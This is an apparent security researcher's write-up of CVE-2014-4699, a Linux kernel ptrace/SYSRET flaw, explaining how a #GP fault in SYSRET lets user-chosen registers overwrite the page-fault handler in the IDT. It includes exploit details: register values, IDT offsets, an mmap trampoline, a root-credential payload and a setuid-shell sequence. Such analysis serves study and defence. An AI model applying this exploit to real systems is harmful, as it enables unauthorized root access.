CVE-2014-4699: Linux Kernel ptrace/sysret vulnerability analysis

by Vitaly Nikolenko

Posted on July 21, 2014 at 6:52PM


I believe this bug was first discovered around 2005 and affected a number of operating systems (not just Linux) on Intel 64-bit CPUs. The bug comes down to how the SYSRET instruction is used by 64-bit kernels in the system call exit path. Unlike its slower alternative IRET, SYSRET does not restore all the general-purpose registers (notably %rsp) or reload the segment registers, which is exactly why it's faster than IRET. I've released PoC code (on Twitter last week) that triggers a #GP fault in SYSRET and overwrites the #PF handler, transferring the execution flow to a NOP sled mapped at a specific memory address in user-space. The following is my attempt to explain how this vulnerability is triggered.

First, let's take a step back to see what the SYSRET instruction actually does. According to AMD, the SYSRET does the following:

  1. Load the instruction pointer (%rip) from %rcx
  2. Change the code segment selector to its user-mode value (this effectively drops the privilege level back to ring3)

and this is exactly what it does on both Intel and AMD platforms. However, the difference between the two platforms comes into play when a general protection fault (#GP) is triggered. This fault is raised if a non-canonical memory address ends up in %rcx upon executing the SYSRET instruction (since SYSRET loads %rip from %rcx). What is a non-canonical address? There are a few good explanations on the web. On AMD CPUs, the new %rip is not checked until after the privilege level has been dropped back to user mode (and a #GP in user-space is not very interesting). On Intel CPUs, however, the #GP fault is raised while still in privileged mode (ring0). This also means that the current %rsp value is used in handling the #GP! Since SYSRET does not restore %rsp, the kernel has to do that itself prior to executing SYSRET, so by the time the #GP happens, the kernel has already loaded %rsp with the user-space stack pointer. In summary, this means that if we can trigger a #GP in SYSRET:

  1. #GP will execute in privileged mode
  2. #GP will use the stack pointer supplied by us from user-space

That's great, but how do we trigger the #GP fault in the first place? The %rip address loaded from %rcx would normally always be canonical. That's where ptrace comes into play. If you are not familiar with ptrace, the ptrace(2) man page is a good place to start. In short, ptrace is how debuggers stop a running process and let you change register values on the fly. Using ptrace we can change %rip and %rsp to arbitrary values. Most ptrace stops go through the signal path, which always returns to the tracee with IRET. However, there are a few paths that get caught with ptrace_event() instead of the signal path. Refer to the PoC code for an example of using fork() with ptrace to force such a path.


For the exploitation phase, I was using Ubuntu 12.04.0 LTS (3.2.0-23-generic), simply because that's the VM I had at hand. I believe the issue affects both the 2.6.x and 3.x branches.

To trigger the #GP fault in SYSRET we obviously need to set our %rip to a non-canonical address. In the PoC I'm using 0x8fffffffffffffff, but any non-canonical address would work. The next step is to set the %rsp value. If we set it to a user-space address, we'll simply double fault. However, if we set it to a writable address in kernel-space, the fault-handling code will push state there, letting us overwrite kernel data.

Let's take a look at the general_protection handler that we enter with an arbitrary %rsp pointer:

0xffffffff8165cba0 <general_protection>       data32 xchg %ax,%ax
0xffffffff8165cba3 <general_protection+3>     data32 xchg %ax,%ax
0xffffffff8165cba6 <general_protection+6>     sub    $0x78,%rsp
0xffffffff8165cbaa <general_protection+10>    callq  0xffffffff8165cd90 <error_entry>     [1]
0xffffffff8165cbaf <general_protection+15>    mov    %rsp,%rdi
0xffffffff8165cbb2 <general_protection+18>    mov    0x78(%rsp),%rsi
0xffffffff8165cbb7 <general_protection+23>    movq   $0xffffffffffffffff,0x78(%rsp)
0xffffffff8165cbc0 <general_protection+32>    callq  0xffffffff8165d040 <do_general_protection> [2]
0xffffffff8165cbc5 <general_protection+37>    jmpq   0xffffffff8165ce30 <error_exit>
0xffffffff8165cbca                            nopw   0x0(%rax,%rax,1)

When error_entry is called at [1], the saved registers are written to the stack, from 0x78(%rsp) down to 0x8(%rsp):

0xffffffff8165cd90 <error_entry>                cld
0xffffffff8165cd91 <error_entry+1>              mov    %rdi,0x78(%rsp)
0xffffffff8165cd96 <error_entry+6>              mov    %rsi,0x70(%rsp)
0xffffffff8165cd9b <error_entry+11>             mov    %rdx,0x68(%rsp)
0xffffffff8165cda0 <error_entry+16>             mov    %rcx,0x60(%rsp)
0xffffffff8165cda5 <error_entry+21>             mov    %rax,0x58(%rsp)
0xffffffff8165cdaa <error_entry+26>             mov    %r8,0x50(%rsp) 
0xffffffff8165cdaf <error_entry+31>             mov    %r9,0x48(%rsp) 
0xffffffff8165cdb4 <error_entry+36>             mov    %r10,0x40(%rsp)
0xffffffff8165cdb9 <error_entry+41>             mov    %r11,0x38(%rsp)
0xffffffff8165cdbe <error_entry+46>             mov    %rbx,0x30(%rsp)
0xffffffff8165cdc3 <error_entry+51>             mov    %rbp,0x28(%rsp)
0xffffffff8165cdc8 <error_entry+56>             mov    %r12,0x20(%rsp)
0xffffffff8165cdcd <error_entry+61>             mov    %r13,0x18(%rsp)
0xffffffff8165cdd2 <error_entry+66>             mov    %r14,0x10(%rsp)
0xffffffff8165cdd7 <error_entry+71>             mov    %r15,0x8(%rsp) 

However, we can control all these registers (well, except for %rcx) via PTRACE_SETREGS (see the PoC for details):

struct user_regs_struct regs;

// get current registers
ptrace(PTRACE_GETREGS, chld, NULL, &regs);

// modify regs (%rip, %rsp, and the values error_entry will store)

// set regs
ptrace(PTRACE_SETREGS, chld, NULL, &regs);

The general_protection handler then invokes the do_general_protection function at [2]:

Dump of assembler code for function do_general_protection:
   0xffffffff8165d040 <+0>:     push   %rbp
   0xffffffff8165d041 <+1>:     mov    %rsp,%rbp
   0xffffffff8165d044 <+4>:     sub    $0x20,%rsp
   0xffffffff8165d048 <+8>:     mov    %rbx,-0x18(%rbp)
   0xffffffff8165d04c <+12>:    mov    %r12,-0x10(%rbp)
   0xffffffff8165d050 <+16>:    mov    %r13,-0x8(%rbp)
   0xffffffff8165d054 <+20>:    callq  0xffffffff816647c0 <mcount>
   0xffffffff8165d059 <+25>:    testb  $0x2,0x91(%rdi)
   0xffffffff8165d060 <+32>:    mov    %rdi,%r12
   0xffffffff8165d063 <+35>:    mov    %rsi,%r13
   0xffffffff8165d066 <+38>:    je     0xffffffff8165d06f <do_general_protection+47>
   0xffffffff8165d068 <+40>:    callq  *0xffffffff81c177d8
   0xffffffff8165d06f <+47>:    mov    %gs:0xc500,%rbx                                   [3]
   0xffffffff8165d078 <+56>:    testb  $0x3,0x88(%r12)
   0xffffffff8165d081 <+65>:    je     0xffffffff8165d140 <do_general_protection+256>

At [3], the kernel will page fault when accessing %gs:0xc500, then double fault and crash. The question now is: what can we do to prevent the kernel from crashing and, ideally, transfer execution flow to a memory region we've mapped in user-space? Well, let's just overwrite the #PF (Page Fault) handler in the IDT (Interrupt Descriptor Table) with a memory address that we control. In the PoC code, I've mapped the following memory region in user-space:

   trampoline = mmap((void *)0x80000000, 0x10000000,
                     PROT_EXEC|PROT_READ|PROT_WRITE,
                     MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED|MAP_POPULATE|MAP_GROWSDOWN,
                     -1, 0);

We then set our %rsp value to regs.rsp = idt.addr + 14*16 + 8 + 0xb0 - 0x78, i.e., the IDT base address, plus the offset of the #PF gate (#PF is vector 14 and each gate descriptor is 16 bytes), plus 8 bytes (so that the stores land on bits 32..63 of the #PF handler offset, which we overwrite with 0), plus some padding to account for the handler's stack usage before error_entry's stores. The Intel developer's manual (Vol. 3A) provides a good explanation of the IDT gate structure.

In the PoC code, the %rdi value (which is set to 0, regs.rdi = 0x0000000000000000) will overwrite bits 32..63 of the #PF handler offset, leaving a handler address that points to user-space. On my test VM, this address is 0x8165cbd0, which is why we've mapped our user-space memory region at 0x80000000-0x90000000.

I should point out that it's important to use MAP_POPULATE when mapping this memory region so that we don't trigger a #PF on accessing our mapped user-space address, i.e., a #PF would trigger a double fault in this case. Here's the excerpt from the mmap(2) man page:

 MAP_POPULATE (since Linux 2.5.46)
              Populate (prefault) page tables for a mapping.  For a file
              mapping, this causes read-ahead on the file.  Later accesses
              to the mapping will not be blocked by page faults.
              MAP_POPULATE is supported for private mappings only since
              Linux 2.6.23.

Once the #PF is triggered, we'll land in our NOP sled. However, by that time, the IDT will be trashed: we've overwritten a few IDT entries, including a number of critical handlers. In the PoC, there is an attempt to restore the IDT by setting the register values (%rdi, %rsi, %rdx, etc.) to the original values:

	regs.rdi = 0x0000000000000000;
	regs.rsi = 0x81658e000010cbd0;
	regs.rdx = 0x00000000ffffffff;
	regs.rcx = 0x81658e000010cba0;
	regs.rax = 0x00000000ffffffff;
	regs.r8  = 0x81658e010010cb00;
	regs.r9  = 0x00000000ffffffff;
	regs.r10 = 0x81668e0000106b10;
	regs.r11 = 0x00000000ffffffff;
	regs.rbx = 0x81668e0000106ac0;
	regs.rbp = 0x00000000ffffffff;
	regs.r12 = 0x81668e0000106ac0;
	regs.r13 = 0x00000000ffffffff;
	regs.r14 = 0x81668e0200106a90;
	regs.r15 = 0x00000000ffffffff;

This code is obviously very kernel-specific. In the payload, we can then do the usual privilege-escalation routine commit_creds(prepare_kernel_cred(NULL)), followed by some syscall/shell work (e.g., setuid(0); cp /bin/sh .; chown root:root ./sh; chmod u+s ./sh). Alternatively, we could set up the appropriate registers and IRET back to user-space with a stack pointer of our choice.


There are a few things to note here. The PoC is very kernel-specific, and trashing the IDT is not a good approach (it affects kernel stability). Since 3.10.x the IDT has been mapped read-only, so this approach no longer works there. There are other kernel structs that could be overwritten instead, giving a more reliable (and somewhat more universal) way of exploitation.